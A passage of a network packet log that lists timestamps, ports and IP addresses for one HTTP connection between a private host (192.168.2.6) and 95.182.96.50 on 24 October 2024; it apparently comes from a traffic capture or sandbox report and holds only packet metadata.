Oct 24, 2024 13:54:21.598836899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598843098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598870993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598877907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598906994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598911047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598941088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.598953962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.598977089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599009991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599021912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599046946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599083900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599091053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599118948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599128008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599153042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599185944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599195957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599222898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599256039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599272966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599289894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599337101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599343061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599375963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599380970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599411964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599445105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599457026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599479914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599514008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599524021 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599549055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599555016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599582911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599617004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599626064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599652052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599668980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599685907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599693060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599715948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599725962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599751949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599756956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599788904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599802017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599824905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599858999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599864960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599896908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.599935055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.599956036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.710654974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.710724115 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.710731030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.710799932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.710855007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.710861921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.710899115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.710947037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.710952997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.710990906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711024046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711057901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711069107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711077929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711112976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711124897 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711168051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711174011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711220026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711222887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711258888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711292028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711324930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711340904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711383104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711436033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711474895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711488008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711510897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711546898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711597919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711599112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711643934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711654902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711708069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711760998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711795092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711812019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711834908 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711842060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711899996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711932898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711951971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.711970091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.711980104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712008953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712042093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712055922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712096930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712131023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712183952 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712188959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712223053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712239027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712258101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712307930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712311029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712346077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712357998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712383032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712433100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712438107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712466955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712507963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712518930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712553978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712605953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712610006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712729931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712759018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712783098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712788105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712820053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712853909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712869883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712902069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712902069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712934017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712949991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712949991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712965012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712973118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.712982893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.712996006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713010073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713016987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713025093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713040113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713056087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713068008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713071108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713078022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713087082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713103056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713107109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713123083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713129997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713136911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713151932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713154078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713171005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713186979 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713195086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713218927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713222027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713232994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713243961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713251114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713268042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713270903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713283062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713293076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713300943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713314056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713315964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713334084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713334084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713344097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713351965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713361979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713370085 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713382006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713391066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713399887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713411093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713418961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713434935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713469028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713485003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713489056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713501930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713511944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713519096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713535070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713536024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713551044 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713551044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713576078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713577032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713594913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713601112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713610888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713610888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713629007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713634014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713644981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713644981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713664055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713668108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713675022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713680029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713699102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713701963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713726997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713737011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713747025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713763952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713767052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713779926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713788986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713799000 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713821888 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713831902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713849068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713865042 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713881016 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713897943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713907957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713917017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713932037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713933945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713949919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713954926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713964939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713978052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.713982105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.713998079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714004040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714015007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714029074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714030981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714047909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714054108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714065075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714077950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714083910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714101076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714102030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714116096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714124918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714133978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714148998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714152098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714158058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714169025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714176893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714186907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714194059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714204073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714212894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714221001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714224100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714241028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714256048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714257956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714273930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714278936 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714291096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714298964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714307070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714320898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714324951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714342117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714343071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714358091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714366913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714376926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.714390039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714401007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.714417934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826293945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826368093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826402903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826420069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826423883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826467991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826478004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826524973 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826528072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826560020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826611042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826623917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826677084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826687098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826769114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826783895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826801062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826833963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826854944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826895952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826930046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.826948881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.826982975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827038050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827038050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827075958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827109098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827121973 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827142954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827188015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827204943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827249050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827279091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827361107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827395916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827411890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827454090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827491045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827500105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827543974 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827584982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827635050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827639103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827671051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827703953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827738047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827750921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827779055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827789068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827841997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827896118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827898979 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827934027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.827946901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.827989101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828022003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828023911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.828028917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.828073025 CEST	49714	80	192.168.2.6	95.182.96.50
